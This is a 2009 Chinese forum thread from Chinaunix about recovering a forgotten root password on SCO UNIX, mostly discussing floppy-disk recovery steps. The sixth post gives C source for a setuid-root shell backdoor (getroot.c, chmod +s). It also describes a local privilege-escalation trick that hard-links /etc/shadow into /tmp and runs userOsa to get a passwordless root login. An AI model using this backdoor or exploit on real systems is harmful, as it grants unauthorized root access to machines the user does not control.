免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 3245 | 回复: 6
打印 上一主题 下一主题

[SCO UNIX] root用户密码忘记 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-04-12 19:14 |只看该作者 |倒序浏览
如题,上网查过了,试了就是不成功,原来有句命令umount /dev/fd135ds18,感觉好像错的,应该为fd1135ds18或fd0135ds18。机器没有提示要插入ROOT盘呀。论坛好冷清,此贴可能有去没回

论坛徽章:
1
15-16赛季CBA联赛之北控
日期:2022-03-04 22:35:50
2 [报告]
发表于 2009-04-12 20:06 |只看该作者
按网上说的方法可以的,我以前测试过。

论坛徽章:
0
3 [报告]
发表于 2009-04-12 20:23 |只看该作者
http://www.douzhe.com/bbs/thread-2783-1-4.html
看看下面这一段,最后一句应是错的吧:
 二、仍然是在B机上,将ROOT盘插入驱动器,之后按顺序输入以下命令:
  mount /dev/fd0135ds18 /mnt
  cp /etc/passwd /mnt/passwd
  cp /etc/shadow /mnt/shadow
  cp /tcb/files/auth/r/root /mnt/root
  cd
  umount /dev/fd135ds18
查了根本没有fd135ds18,只有fd1135ds18或fd0135ds18。
至于没有提示插入ROOT盘,可能是原机内核太大了,在格式化或解压过程中出错了,今天我看到。
刚装好了个新系统,我再去试试,我现在想确认是不是最后的哪句语句错了。

论坛徽章:
0
4 [报告]
发表于 2009-04-12 21:29 |只看该作者
三、将BOOT盘插入A机的驱动器,并修改A机的BIOS参数,使机器从A驱开始引导。当出现“BOOT;”提示时按回车键,直到机器提示要插入ROOT盘时,再将BOOT盘取出,插入ROOT盘并回车,一直等到出现“#”提示符为止。
我在电脑已经设为A驱启动了,为什么还像以前哪样正常启动,也没有提示插入ROOT盘呀,谁来帮帮忙呀。

论坛徽章:
0
5 [报告]
发表于 2009-04-21 13:59 |只看该作者

回复 #1 hrduan268 的帖子

可以不用那么麻烦   用uinx的一个bug   可以不用root 盘和boot启动盘就可以搞定   
但是需要你至少有一个uinx 的用户
普通用户就行

论坛徽章:
0
6 [报告]
发表于 2009-04-21 14:13 |只看该作者

回复 #1 hrduan268 的帖子

几种方法:提示下

一:#include <stdio.h>;
  #include <unistd.h>;
  main()
  {
  int i=0&#59;//
  int j=3&#59;
  setuid(i)&#59;
  setgid(j)&#59;
  execl(“/bin/sh&quot;,NULL)&#59;
  }
保存为 getroot.c
在装有开发系统的计算机上代码,执行:
  cc getroot.c -o getroot
应急盘启动 然后程序拷入硬盘
cd /mnt/usr/bin
  tar xvf /dev/rfd0135ds18
  chown root:sys getroot
  chmod 777 getroot
  chmod +s getroot

然后重启》reboot   以普通用户登陆  执行getroot 命令  此时你的$ 符号就变为#
OK

二:(如果你有任何一个普通用户   进入到任何一个地方(只要你能写的目录)  

$ln /etc/shadow /tmp/debug.log
$ch /tmp
$/etc/sysadm.d/bin/userOsa
回车
用root登陆,不要密码

OK  进入到系统了


然后执行这个程序

论坛徽章:
0
7 [报告]
发表于 2009-04-30 17:06 |只看该作者
我试过至少3种网上的方法,正确操作应该可以的。5楼说的方法我也试过,也成功过。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP